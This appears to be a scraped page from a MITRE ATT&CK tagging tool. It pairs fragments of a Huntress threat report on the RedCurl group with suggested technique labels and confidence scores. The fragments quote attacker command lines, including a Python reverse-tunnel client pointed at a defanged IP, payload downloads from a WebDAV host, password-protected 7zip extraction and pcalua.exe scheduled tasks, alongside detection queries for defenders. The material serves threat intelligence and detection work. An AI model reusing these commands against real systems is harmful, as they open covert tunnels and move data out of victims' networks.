“exe to launch the malware via scheduled tasks. this binary executed a batch script, which then launched powershell to unarchive files with 7zip and add them to the system. " c : \ programdata \ 7za. exe " x - aoa - p < redacted > revtun3ag. tmp - oc : \ programdata \ controlsup a…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1053.005Scheduled Task
99%
“controlsup \ cl \ cl. py - - s 188. 130. 207 [. ] 253 - - p 10310 additional tasks scheduled task 2 wifitask da76918700ee0725 executable : pcalua. exe arguments : - a c : \ windows \ system32 \ config \ systemprofile \ appdata \ local \ wcm \ mbda76918700ee0725. exe scheduled tas…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1053.005Scheduled Task
99%
“) by running the command : get - scheduledtask - taskname " [ task name ] " - verbose | select - expandproperty actions the sigma rule scheduled task executed uncommon lolbin contains the right logic for this, but would just need the addition of \ pcalua. exe to the list of paths…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1053.005Scheduled Task
99%
“- a ” ) then, you can utilize a sigma rule for basic pcalua. exe execution and add any filters for normal activity you observe. if you have the microsoft - windows - taskscheduler / operational event log enabled, you can search for tasks that are created that execute pcalua. exe,…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1053.005Scheduled Task
99%
“practices for event logging and threat detection " was published, which again highlighted the heavy use of lotl techniques and gave guidance on setting up proper logging to detect these attacks. the most common technique we saw used in these incidents was the use of pcalua. exe i…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.001PowerShell
97%
“##za. exe " ) ) and process. parent. name = = “ powershell. exe ” note : the queries above should be made case insensitive, if possible in your environment, for the best results. conclusion the activity observed in this attack highlights the importance of constantly monitoring yo…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.006Python
96%
“looking for python executables in those events while filtering out some normal activity. alternatively, you can hunt for the same activity by running queries through process data looking for python. exe or pythonw. exe with commands that include an ip address, perhaps using a sim…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1053.005Scheduled Task
93%
“##869b4c executable : pcalua. exe arguments : - a c : \ users \ < redacted > \ appdata \ local \ subscriptionmonitor \ uo94e668b9cf869b4c. exe scheduled task 5 silentcleanup 6db9110b3989a881 executable : pcalua. exe arguments : - a c : \ programdata \ diskcleanup \ om6db9110b3989…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1486Data Encrypted for Impact
93%
“and guidance for detecting and mitigating these attacks. this was followed up with the creation and release of another joint effort document called " identifying and mitigating living off the land techniques " which can be found on the australian signals directorate website, whic…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1560.001Archive via Utility
92%
“in process data ) from these incidents : start " " " % pdir % \ pythonw. exe " % pdir % \ rpv \ client. py - - server - ip % srv % - - server - port % port % this query would likely have a number of legitimate matches in many development environments where python is used frequent…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1105Ingress Tool Transfer
91%
“download files called revtun1. tmp and revtun2. tmp from bora. teracloud [. ] jp / dav using http get requests crafted within the powershell commands. the files downloaded are then extracted with 7zip, using a password stored in the batch file. this specific behavior was used by …”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1053.005Scheduled Task
86%
“. exe arguments : - a c : \ programdata \ diskcleanup \ om6db9110b3989a881. exe we also saw additional scheduled tasks, which are likely related activity that used pcalua. exe to call pythonw. exe and execute a script to start reverse proxy tunnels. this seems to have been on som…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1560.001Archive via Utility
84%
“to start looking for more specific behavior of query for creating password - protected archive files with 7zip and deleting the original files with the - sdel flag : where ( ( winlog. event _ data. description like " * 7 - zip * " or ( process. name = = " 7z. exe " or process. na…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1486Data Encrypted for Impact
73%
“motivated threat actor who may be interested in the data that can be found in your network. iocs files network indicators mitre att & ck mapping references - trend micro report : “ unveiling earth kapre ( aka redcurl ' s cyberespionage tactics ) " - group - ib redcurl reports : 2…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.001PowerShell
69%
“download files called revtun1. tmp and revtun2. tmp from bora. teracloud [. ] jp / dav using http get requests crafted within the powershell commands. the files downloaded are then extracted with 7zip, using a password stored in the batch file. this specific behavior was used by …”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1053.005Scheduled Task
56%
“learned from these incidents and how to detect similar techniques that redcurl or any other malware or adversaries could use in the future. what did we find? the huntress security operations center ( soc ) received an alert on a host that had recently installed the huntress agent…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.001PowerShell
56%
“we identified the same tradecraft used on additional hosts and at various other organizations. we uncovered three intrusions across three different organizations that were all fully or partially located in canada. the activity observed in these attacks all match very closely with…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1053Scheduled Task/Job
42%
“practices for event logging and threat detection " was published, which again highlighted the heavy use of lotl techniques and gave guidance on setting up proper logging to detect these attacks. the most common technique we saw used in these incidents was the use of pcalua. exe i…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1005Data from Local System
38%
“hunt for redcurl | huntress in mid to late 2024, huntress uncovered activity across several organizations in canada, with similar infrastructure and ttps used that can be associated with the apt group known as redcurl ( aka earth kapre and red wolf ). this activity goes back as f…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1560.001Archive via Utility
30%
“from a particular software or process, and would be easy to filter out this known activity. hunting for this particular process chain would catch a good amount of the observed redcurl activity and some other possibly interesting events. the dfirreport noted in their report from a…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
Summary
Huntress discovered RedCurl activity across several organizations in Canada going back to 2023. Learn more about how this APT operates and how they aim to remain undetected while exfiltrating sensitive data.